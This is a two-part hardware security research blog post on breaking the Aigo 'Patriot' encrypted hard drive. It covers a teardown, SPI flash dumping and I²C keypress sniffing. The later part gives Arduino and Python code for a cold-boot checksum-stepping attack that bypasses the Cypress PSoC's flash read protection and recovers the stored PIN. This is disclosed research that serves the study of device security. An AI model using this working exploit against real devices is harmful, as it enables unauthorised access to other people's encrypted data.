[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[9F 40 1C] wrmem BLOCKID, 0x00
[DE 00 FC] wrreg A (f0), 0x07
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

Which is just a call to SROM function 0x07, documented as follows (emphasis mine):

The Checksum function calculates a 16-bit checksum over a user specifiable number of blocks, within a single Flash bank starting at block zero. The BLOCKID parameter is used to pass in the number of blocks to checksum. A BLOCKID value of ‘1’ will calculate the checksum of only block 0, while a BLOCKID value of ‘0’ will calculate the checksum of 256 blocks in the bank. The 16-bit checksum is returned in KEY1 and KEY2. The parameter KEY1 holds the lower 8 bits of the checksum and the parameter KEY2 holds the upper 8 bits of the checksum. For devices with multiple Flash banks, the checksum function must be called once for each Flash bank. The SROM Checksum function will operate on the Flash bank indicated by the Bank bit in the FLS_PR1 register.

Note that it is an actual checksum: bytes are summed one by one, no fancy CRC here. Also, considering the extremely limited register set of the M8C core, I suspected that the checksum would be directly stored in RAM, most probably in its final location: KEY1 (0xF8) / KEY2 (0xF9).

So the final attack is, in theory:

  1. Connect using ISSP
  2. Start a checksum computation using the CHECKSUM-SETUP vector
  3. Reset the CPU after some time T
  4. Read the RAM to get the current checksum C
  5. Repeat 3. and 4., increasing T a little each time
  6. Recover the flash content by subtracting consecutive checksums C
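Step 6 can be sketched in a few lines of Python. This is an idealised simulation, assuming we manage to sample the running checksum exactly once per byte; the helper names `running_checksums` and `recover_bytes` are made up for the example.

```python
def running_checksums(flash):
    """Simulate the 16-bit running sum after each flash byte."""
    total, samples = 0, []
    for b in flash:
        total = (total + b) & 0xFFFF
        samples.append(total)
    return samples


def recover_bytes(samples):
    """Recover the bytes by subtracting consecutive checksum samples."""
    prev, out = 0, bytearray()
    for c in samples:
        out.append((c - prev) & 0xFF)   # difference is always a single byte
        prev = c
    return bytes(out)


flash = bytes([0x80, 0x67, 0x30, 0x00, 0xFF])
print(recover_bytes(running_checksums(flash)).hex())
```

Note that a 0x00 byte leaves the checksum unchanged, so in practice the samples have to be taken at known points in time rather than whenever the value changes.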

However, we have a problem: the Initialize-1 vector, which we have to send after reset, overwrites KEY1 and KEY2:

1100101000000000000000                 # Magic to put the PSoC in prog mode
nop
nop
nop
nop
nop
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A            # Checksum overwritten here
[9F 20 7C] wrmem KEY2, 0x03            # and here
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 01 3C] wrreg A (f0), 0x09          # SROM function 9
[DF 00 1C] wrreg opc0 (f8), 0x00       # SSC
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

But this code, overwriting our precious checksum, is just calling Calibrate1 (SROM function 9)… Maybe we can just send the magic to enter prog mode and then read the SRAM ?

And yes, it works !

The Arduino code implementing the attack is quite simple:

    case Cmnd_STK_START_CSUM:
      checksum_delay = ((uint32_t)getch())<<24;
      checksum_delay |= ((uint32_t)getch())<<16;
      checksum_delay |= ((uint32_t)getch())<<8;
      checksum_delay |= getch();
      if(checksum_delay > 10000) {
         ms_delay = checksum_delay/1000;
         checksum_delay = checksum_delay%1000;
      }
      else {
         ms_delay = 0;
      }
      send_checksum_v();
      if(checksum_delay)
          delayMicroseconds(checksum_delay);
      delay(ms_delay);
      start_pmode();

  1. It reads the checksum_delay
  2. Starts computing the checksum (send_checksum_v)
  3. Waits for the appropriate amount of time, with some caveats:
    • I lost some time here until I realized delayMicroseconds is precise only up to 16383µs
    • and then again because delayMicroseconds(0) is totally wrong !
  4. Resets the PSoC to prog mode (without sending the initialization vectors, just the magic)
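The delay splitting in step 3 is easy to get wrong, so here is a small Python model of the same logic (not the Arduino code itself; `split_delay` is a name made up for this sketch). It lets us check that the two parts always add back up to the requested delay and that the microsecond part stays well below the 16383µs limit.

```python
def split_delay(checksum_delay_us):
    """Mirror the Arduino logic: return (ms_delay, remaining_us)."""
    if checksum_delay_us > 10000:
        return checksum_delay_us // 1000, checksum_delay_us % 1000
    return 0, checksum_delay_us


for requested in (0, 24, 10000, 10001, 145527):
    ms, us = split_delay(requested)
    # us == 0 is the case where delayMicroseconds must be skipped
    print(requested, "->", ms, "ms +", us, "us")
```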

The final Python code is:

for delay in range(0, 150000):                          # delay in microseconds
    for i in range(0, 10):                              # number of reads for each delay
        try:
            reset_psoc(quiet=True)                      # reset and enter prog mode
            send_vectors()                              # send init vectors
            ser.write("\x85"+struct.pack(">I", delay))  # do checksum + reset after delay
            res = ser.read(1)                           # read arduino ACK
        except Exception as e:
            print e
            ser.close()
            os.system("timeout -s KILL 1s picocom -b 115200 /dev/ttyACM0 2>&1 > /dev/null")
            ser = serial.Serial('/dev/ttyACM0', 115200, timeout=0.5)  # open serial port
            continue
        print "%05d %02X %02X %02X" % (delay,           # read RAM bytes
                                       read_regb(0xf1),
                                       read_ramb(0xf8),
                                       read_ramb(0xf9))

What it does is simple:

  1. Reset the PSoC (and send the magic)
  2. Send the full initialization vectors
  3. Call the Cmnd_STK_START_CSUM (0x85) function on the Arduino, with a delay argument in microseconds.
  4. Read the checksum (0xF8 and 0xF9) and the undocumented 0xF1 register

This is repeated 10 times for each 1 microsecond step.
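For reference, the framing of the 0x85 command can be sketched as follows, in Python 3 syntax. The command byte and the big-endian 32-bit delay come from the code above; the helper names `encode_start_csum` and `decode_delay` are hypothetical, the latter mimicking the four shifted `getch()` calls on the Arduino side.

```python
import struct

CMND_STK_START_CSUM = 0x85


def encode_start_csum(delay_us):
    """Build the serial message: command byte + big-endian 32-bit delay."""
    return bytes([CMND_STK_START_CSUM]) + struct.pack(">I", delay_us)


def decode_delay(payload):
    """Rebuild the delay the way the Arduino does, most significant byte first."""
    delay = 0
    for b in payload:
        delay = (delay << 8) | b
    return delay


msg = encode_start_csum(145527)
print(msg.hex())               # 8500023877
print(decode_delay(msg[1:]))   # 145527
```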

0xF1 is included as it was the only register that seemed to change while computing the checksum. It could be some temporary register used by the ALU ?

Note the ugly hack I use to reset the Arduino using picocom, when it stops responding (I have no idea why).

Reading the results

The output of the Python script looks like this (simplified for readability):

DELAY F1 F8 F9  # F1 is the unknown reg
                # F8 is the checksum LSB
                # F9 is the checksum MSB

00000 03 E1 19
[...]
00016 F9 00 03
00016 F9 00 00
00016 F9 00 03
00016 F9 00 03
00016 F9 00 03
00016 F9 00 00  # Checksum is reset to 0
00017 FB 00 00
[...]
00023 F8 00 00
00024 80 80 00  # First byte is 0x0080-0x0000 = 0x80 
00024 80 80 00
00024 80 80 00
[...]
00057 CC E7 00  # 2nd byte is 0xE7-0x80: 0x67
00057 CC E7 00
00057 01 17 01  # I have no idea what's going on here
00057 01 17 01
00057 01 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 F8 E7 00  # E7 is back ?
00058 D0 17 01
[...]
00059 E7 E7 00
00060 17 17 00  # Hmmm
[...]
00062 00 17 00
00062 00 17 00
00063 01 17 01  # Oh ! Carry is propagated to MSB
00063 01 17 01
[...]
00075 CC 17 01  # So 0x117-0xE7: 0x30

However, since this is a real checksum (a plain sum), a null byte does not change its value, so we cannot rely only on changes in the checksum. But since the full computation (8192 bytes) runs in 0.1478s, which translates to about 18.04µs per byte, we can use this timing to sample the value of the checksum at the right points in time.
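The timing arithmetic can be written down as a short sketch. The per-byte time is derived from the two figures above; the `start_us` parameter (the delay at which the first byte has been summed) is a hypothetical calibration value that would have to be read from the dump.

```python
TOTAL_BYTES = 8192
TOTAL_TIME_US = 147800                       # 0.1478 s for the full checksum
US_PER_BYTE = TOTAL_TIME_US / TOTAL_BYTES    # about 18.04 µs


def expected_delay(offset, start_us):
    """Estimated delay (µs) at which the byte at `offset` has been summed."""
    return start_us + offset * US_PER_BYTE


print("%.2f us per byte" % US_PER_BYTE)
print(round(expected_delay(125 * 64, 0)))    # rough start of the 126th block
```

This is only an estimate: as shown next, the run-to-run variation grows towards the end of the flash.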

Of course at the beginning, everything is “easy” to read as the variation in execution time is negligible. But the end of the dump is less precise as the variability of each run increases:

134023 D0 02 DD
134023 CC D2 DC
134023 CC D2 DC
134023 CC D2 DC
134023 FB D2 DC
134023 3F D2 DC
134023 CC D2 DC
134024 02 02 DC
134024 CC D2 DC
134024 F9 02 DC
134024 03 02 DD
134024 21 02 DD
134024 02 D2 DC
134024 02 02 DC
134024 02 02 DC
134024 F8 D2 DC
134024 F8 D2 DC
134025 CC D2 DC
134025 EF D2 DC
134025 21 02 DD
134025 F8 D2 DC
134025 21 02 DD
134025 CC D2 DC
134025 04 D2 DC
134025 FB D2 DC
134025 CC D2 DC
134025 FB 02 DD
134026 03 02 DD
134026 21 02 DD

Hence the 10 dumps for each µs of delay. The total running time to dump the 8192 bytes of flash was about 48h.
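One naive way to exploit the repeated reads is a majority vote per delay value. The sketch below is only an illustration of that idea, not the decoder (which is not written yet): `majority_checksum` is a made-up helper, and the sample data are the (F8, F9) pairs of the seven reads shown above for delay 134023.

```python
from collections import Counter


def majority_checksum(reads):
    """reads: list of (F8, F9) pairs for one delay. Returns (checksum, votes)."""
    (lsb, msb), votes = Counter(reads).most_common(1)[0]
    return (msb << 8) | lsb, votes


reads_134023 = [(0x02, 0xDD)] + [(0xD2, 0xDC)] * 6
csum, votes = majority_checksum(reads_134023)
print("%04X (%d/%d reads)" % (csum, votes, len(reads_134023)))   # DCD2 (6/7 reads)
```

A low vote count for a given delay is a hint that the sample was taken right on a byte boundary and should be treated with care.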

Reconstructing the flash image

I have not yet written the code to fully recover the flash, taking into account all the timing problems. However, I did recover the beginning. To make sure it was correct, I disassembled it with m8cdis:

0000: 80 67     jmp   0068h         ; Reset vector
[...]
0068: 71 10     or    F,010h
006a: 62 e3 87  mov   reg[VLT_CR],087h
006d: 70 ef     and   F,0efh
006f: 41 fe fb  and   reg[CPU_SCR1],0fbh
0072: 50 80     mov   A,080h
0074: 4e        swap  A,SP
0075: 55 fa 01  mov   [0fah],001h
0078: 4f        mov   X,SP
0079: 5b        mov   A,X
007a: 01 03     add   A,003h
007c: 53 f9     mov   [0f9h],A
007e: 55 f8 3a  mov   [0f8h],03ah
0081: 50 06     mov   A,006h
0083: 00        ssc
[...]
0122: 18        pop   A
0123: 71 10     or    F,010h
0125: 43 e3 10  or    reg[VLT_CR],010h
0128: 70 00     and   F,000h ; Paging mode changed from 3 to 0
012a: ef 62     jacc  008dh
012c: e0 00     jacc  012dh
012e: 71 10     or    F,010h
0130: 62 e0 02  mov   reg[OSC_CR0],002h
0133: 70 ef     and   F,0efh
0135: 62 e2 00  mov   reg[INT_VC],000h
0138: 7c 19 30  lcall 1930h
013b: 8f ff     jmp   013bh
013d: 50 08     mov   A,008h
013f: 7f        ret

It looks good !

Locating the PIN address

Now that we can read the checksum at arbitrary points in time, we can check easily if and where it changes after:

  • entering a wrong PIN
  • changing the PIN

First, to locate the approximate location, I dumped the checksum in steps for 10ms after reset. Then I entered a wrong PIN and did the same.

The results were not very nice as there’s a lot of variation, but it appeared that the checksum changes between 120000µs and 140000µs of delay. This was actually completely false: an artefact of delayMicroseconds doing nonsense when called with 0.

Then, after losing about 3 hours, I remembered that the SROM’s CheckSum syscall has an argument that lets you specify the number of blocks to checksum ! So we can easily locate the PIN and “bad PIN” counter down to a 64-byte block.

My initial runs gave:

No bad PIN          |   14 tries remaining  |   13 tries remaining
                    |                       |
block 125 : 0x47E2  |   block 125 : 0x47E2  |   block 125 : 0x47E2
block 126 : 0x6385  |   block 126 : 0x634F  |   block 126 : 0x6324
block 127 : 0x6385  |   block 127 : 0x634F  |   block 127 : 0x6324
block 128 : 0x82BC  |   block 128 : 0x8286  |   block 128 : 0x825B

Then I changed the PIN from “123456” to “1234567”, and I got:

No bad try            14 tries remaining
block 125 : 0x47E2    block 125 : 0x47E2
block 126 : 0x63BE    block 126 : 0x6355
block 127 : 0x63BE    block 127 : 0x6355
block 128 : 0x82F5    block 128 : 0x828C

So both the PIN and “bad PIN” counter seem to be stored in block 126.
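The comparison is simple enough to automate. Here is a sketch using the values from the first table (no bad PIN vs. 14 tries remaining); the function name `first_changed_blockid` is hypothetical.

```python
def first_changed_blockid(before, after):
    """Return the first block number whose checksum differs, or None."""
    for blockid in sorted(before):
        if before[blockid] != after[blockid]:
            return blockid
    return None


no_bad_pin = {125: 0x47E2, 126: 0x6385, 127: 0x6385, 128: 0x82BC}
tries_14 = {125: 0x47E2, 126: 0x634F, 127: 0x634F, 128: 0x8286}
print(first_changed_blockid(no_bad_pin, tries_14))   # 126
```

Since each checksum covers everything from block zero, all later values differ too; only the first difference tells us where the modified data lives.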

Dumping block 126

Block 126 should be about 125x64x18 = 144000µs after the start of the checksum. To make sure, I looked for checksum 0x47E2 in my full dump, and it looked more or less correct.

Then, after dumping lots of imprecise (because of timing) data, manually fixing the results and comparing flash values (by staring at them), I finally got the following bytes at delay 145527µs:

PIN          Flash content
1234567      2526272021222319141402
123456       2526272021221919141402
998877       2d2d2c2c23231914141402
0987654      242d2c2322212019141402
123456789    252627202122232c2d1902

It is quite obvious that the PIN is stored directly in plaintext ! The values are not ASCII or raw values but probably reflect the readings from the capacitive keyboard.
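The mapping between flash bytes and digits can be checked against the table above. The sketch below uses the same byte-to-digit map as the `dump_pin` code further down; the helper `decode_pin` is made up for this example and simply skips bytes that are not in the map.

```python
PIN_MAP = {0x24: "0", 0x25: "1", 0x26: "2", 0x27: "3", 0x20: "4",
           0x21: "5", 0x22: "6", 0x23: "7", 0x2C: "8", 0x2D: "9"}


def decode_pin(flash_hex):
    """Translate a hex string of flash bytes into PIN digits."""
    return "".join(PIN_MAP[b] for b in bytes.fromhex(flash_hex) if b in PIN_MAP)


for flash_hex in ("2526272021222319141402", "2d2d2c2c23231914141402"):
    print(flash_hex, "->", decode_pin(flash_hex))
```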

Finally, I did some other tests to find where the “bad PIN” counter is, and found this :

Delay  CSUM
145996 56E5 (old: 56E2, val: 03)
146020 571B (old: 56E5, val: 36)
146045 5759 (old: 571B, val: 3E)
146061 57F2 (old: 5759, val: 99)
146083 58F1 (old: 57F2, val: FF) <<---- here
146100 58F2 (old: 58F1, val: 01)

0xFF means “15 tries” and it gets decremented with each bad PIN entered.

Recovering the PIN

Putting everything together, my ugly code for recovering the PIN is:

def dump_pin():
    pin_map = {0x24: "0", 0x25: "1", 0x26: "2", 0x27:"3", 0x20: "4", 0x21: "5",
               0x22: "6", 0x23: "7", 0x2c: "8", 0x2d: "9"}
    last_csum = 0
    pin_bytes = []
    for delay in range(145495, 145719, 16):
        csum = csum_at(delay, 1)
        byte = (csum-last_csum)&0xFF
        print "%05d %04x (%04x) => %02x" % (delay, csum, last_csum, byte)
        pin_bytes.append(byte)
        last_csum = csum
    print "PIN: ",
    for i in range(0, len(pin_bytes)):
        if pin_bytes[i] in pin_map:
            print pin_map[pin_bytes[i]],
    print

Which outputs:

$ ./psoc.py 
syncing:  KO  OK
Resetting PSoC:  KO  Resetting PSoC:  KO  Resetting PSoC:  OK
145495 53e2 (0000) => e2
145511 5407 (53e2) => 25
145527 542d (5407) => 26
145543 5454 (542d) => 27
145559 5474 (5454) => 20
145575 5495 (5474) => 21
145591 54b7 (5495) => 22
145607 54da (54b7) => 23
145623 5506 (54da) => 2c
145639 5506 (5506) => 00
145655 5533 (5506) => 2d
145671 554c (5533) => 19
145687 554e (554c) => 02
145703 554e (554e) => 00
PIN:  1 2 3 4 5 6 7 8 9

Great success !

Note that the delay values I used are probably valid only on the specific PSoC I have.

What’s next ?

So, to sum up on the PSoC side in the context of our Aigo HDD:

  • we can read the SRAM even when it’s protected (by design)
  • we can bypass the flash read protection by doing a cold-boot stepping attack and read the PIN directly

However, the attack is a bit painful to mount because of timing issues. We could improve it by:

  • writing a tool to correctly decode the cold-boot attack output
  • using an FPGA for more precise timings (or use Arduino hardware timers)
  • trying another attack: “enter wrong PIN, reset and dump RAM”, hopefully the good PIN will be stored in RAM for comparison. However, it is not easily doable on Arduino, as it outputs 5V while the board runs on 3.3V.

One very cool thing to try would be to use voltage glitching to bypass the read protection. If it can be made to work, it would give us absolutely accurate reads of the flash, instead of having to rely on checksum readings with poor timings.

As the SROM probably reads the flash protection bits in the ReadBlock “syscall”, we can maybe do the same as described on Dmitry Nedospasov’s blog, a reimplementation of Chris Gerlinsky’s attack presented at REcon Brussels 2017.

One other fun thing would also be to decap the chip and image it to dump the SROM, uncovering undocumented syscalls and maybe vulnerabilities ?

Conclusion

To conclude, the drive’s security is broken, as it relies on a normal (not hardened) micro-controller to store the PIN… and I have not (yet) checked the data encryption part !

What should Aigo have done ? After reviewing a few encrypted HDD models, I did a presentation at SyScan in 2015 which highlights the challenges in designing a secure and usable encrypted external drive and gives a few options to do something better 🙂

Overall, I spent 2 week-ends and a few evenings, so probably around 40 hours from the very beginning (opening the drive) to the end (dumping the PIN), including writing those 2 blog posts. A very fun and interesting journey 😉

Aigo Chinese encrypted HDD − Part 1: taking it apart

Original post by Raphaël Rigo on syscall.eu ( under CC-BY-SA 4.0 )

Introduction

Analyzing and breaking external encrypted HDD has been a “hobby” of mine for quite some time. With my colleagues Joffrey Czarny and Julien Lenoir we looked at several models in the past:

  • Zalman VE-400
  • Zalman ZM-SHE500
  • Zalman ZM-VE500

Here I am going to detail how I had fun with one drive a colleague gave me: the Chinese Aigo “Patriot” SK8671, which follows the classical design for external encrypted HDDs: an LCD for information display and a keyboard to enter the PIN.

DISCLAIMER: This research was done on my personal time and is not related to my employer.

Patriot HDD front view with keyboard Patriot HDD package
Enclosure
Packaging

The user must input a password to access data, which is supposedly encrypted.

Note that the options are very limited:

  • the PIN can be changed by pressing F1 before unlocking
  • the PIN must be between 6 and 9 digits
  • there is a wrong PIN counter, which (I think) destroys data when it reaches 15 tries.

In practice, F2, F3 and F4 are useless.

Hardware design

Of course one of the first things we do is tear down everything to identify the various components.

Removing the case is actually boring, with lots of very small screws and plastic to break.

In the end, we get this (note that I soldered the 5 pins header):

disk

Main PCB

The main PCB is pretty simple:

main PCB

Important parts, from top to bottom:

  • connector to the LCD PCB (CN1)
  • beeper (SP1)
  • Pm25LD010 (datasheet) SPI flash (U2)
  • Jmicron JMS539 (datasheet) USB-SATA controller (U1)
  • USB 3 connector (J1)

The SPI flash stores the JMS539 firmware and some settings.

LCD PCB

The LCD PCB is not really interesting:

LCD view

LCD PCB

It has:

  • an unknown LCD character display (with Chinese fonts probably), with serial control
  • a ribbon connector to the keyboard PCB

Keyboard PCB

Things get more interesting when we start to look at the keyboard PCB:

Keyboard PCB, back

Here, on the back we can see the ribbon connector and a Cypress CY8C21434 PSoC 1 microcontroller (I’ll mostly refer to it as “µC” or “PSoC”):

CY8C21434

The CY8C21434 is using the M8C instruction set, which is documented in the Assembly Language User Guide.

The product page states it supports CapSense, Cypress’ technology for capacitive keyboards, the technology in use here.

You can see the header I soldered, which is the standard ISSP programming header.

Following wires

It is always useful to get an idea of what’s connected to what. Here the PCB has rather big connectors and using a multimeter in continuity testing mode is enough to identify the connections:

hand drawn schematic

Some help to read this poorly drawn figure:

  • the PSoC is represented as in the datasheet
  • the next connector on the right is the ISSP header, which thankfully matches what we can find online
  • the right most connector is the clip for the ribbon, still on the keyboard PCB
  • the black square contains a drawing of the CN1 connector from the main PCB, where the cable goes to the LCD PCB. P11, P13 and P4 are linked to the PSoC pins 11, 13 and 4 through the LCD PCB.

Attack steps

Now that we know what the different parts are, the basic steps would be the same as for the drives analyzed in previous research :

  • make sure basic encryption functionality is there
  • find how the encryption keys are generated / stored
  • find out where the PIN is verified

However, in practice I was not really focused on breaking the security but more on having fun. So, I did the following steps instead:

  • dump the SPI flash content
  • try to dump PSoC flash memory (see part 2)
  • start writing the blog post
  • realize that the communications between the Cypress PSoC and the JMS539 actually contain keyboard presses
  • verify that nothing is stored in the SPI when the password is changed
  • be too lazy to reverse the 8051 firmware of the JMS539
  • TBD: finish analyzing the overall security of the drive (in part 3 ?)

Dumping the SPI flash

Dumping the flash is rather easy:

  • connect probes to the CLK, MOSI, MISO and (optionally) EN pins of the flash
  • sniff the communications using a logic analyzer (I used a Saleae Logic Pro 16)
  • decode the SPI protocol and export the results in CSV
  • use decode_spi.rb to parse the results and get a dump
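To give an idea of what the last step involves, here is a rough Python sketch of rebuilding an image from decoded SPI transactions. It is not decode_spi.rb: the transaction format (one pair of MOSI/MISO byte strings per chip-select cycle) and the function name `rebuild_dump` are assumptions of this example. The only protocol fact it relies on is the usual SPI NOR READ command, opcode 0x03 followed by a 24-bit address.

```python
READ = 0x03  # standard SPI NOR "read data" opcode


def rebuild_dump(transactions, size):
    """Place the data of every READ transaction at its address in the image."""
    image = bytearray(b"\xff" * size)          # unread areas stay at 0xFF
    for mosi, miso in transactions:
        if len(mosi) < 4 or mosi[0] != READ:
            continue                           # skip other commands (read ID, ...)
        addr = int.from_bytes(mosi[1:4], "big")
        if addr >= size:
            continue
        data = miso[4:4 + (size - addr)]       # data follows opcode + address
        image[addr:addr + len(data)] = data
    return bytes(image)


# One READ @ 0x0 returning the first bytes shown in the output below
first_bytes = bytes([0x12, 0x42, 0x00, 0xD3, 0x22, 0x00])
tx = [(bytes([READ, 0, 0, 0]) + bytes(6), bytes(4) + first_bytes)]
print(rebuild_dump(tx, 8).hex())
```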

Note that this works very well with the JMS539 as it loads its whole firmware from flash at boot time.

$ decode_spi.rb boot_spi1.csv dump
0.039776 : WRITE DISABLE
0.039777 : JEDEC READ ID
0.039784 : ID 0x7f 0x9d 0x21
---------------------
0.039788 : READ @ 0x0
0x12,0x42,0x00,0xd3,0x22,0x00,
[...]
$ ls --size --block-size=1 dump
49152 dump
$ sha1sum dump
3d9db0dde7b4aadd2b7705a46b5d04e1a1f3b125  dump

Unfortunately it does not seem obviously useful as:

  • the content did not change after changing the PIN
  • the flash is actually never accessed after boot

So it probably only holds the firmware for the JMicron controller, which embeds an 8051 microcontroller.

Sniffing communications

One way to find which chip is responsible for what is to check communications for interesting timing/content.

As we know, the USB-SATA controller is connected to the screen and the Cypress µC through the CN1 connector and the two ribbons. So, we hook probes to the 3 relevant pins:

  • P4, generic I/O in the datasheet
  • P11, I²C SCL in the datasheet
  • P13, I²C SDA in the datasheet

probes

We then launch Saleae logic analyzer, set the trigger and enter “123456✓” on the keyboard. Which gives us the following view:

Saleae logic analyzer screenshot

You can see 3 different types of communications:

  • on the P4 channel, some short bursts
  • on P11 and P13, almost continuous exchanges

Zooming on the first P4 burst (blue rectangle in previous picture), we get this :

P4 zoom

You can see here that P4 is almost 70ms of pure regular signal, which could be a clock. However, after spending some time making sense of this, I realized that it was actually a signal for the “beep” that goes off every time a key is touched… So it is not very useful in itself, however, it is a good marker to know when a keypress was registered by the PSoC.

However, we have one extra “beep” in the first picture, which is slightly different: the sound for “wrong pin” !

Going back to our keypresses, when zooming at the end of the beep (see the blue rectangle again), we get:

end of beep zoom

Where we have a regular pattern, with a (probable) clock on P11 and data on P13. Note how the pattern changes after the end of the beep. It could be interesting to see what’s going on here.

2-wire protocols are usually SPI or I²C, and the Cypress datasheet says the pins correspond to I²C, which is apparently the case:

i2c decoding of '1' keypress

The USB-SATA chipset constantly polls the PSoC to read the key state, which is ‘0’ by default. It then changes to ‘1’ when key ‘1’ was pressed.

The final communication, right after pressing “✓”, is different if a valid PIN is entered. However, for now I have not checked what the actual transmission is and it does not seem that an encryption key is transmitted.

Anyway, see part 2 to read how I did dump the PSoC internal flash.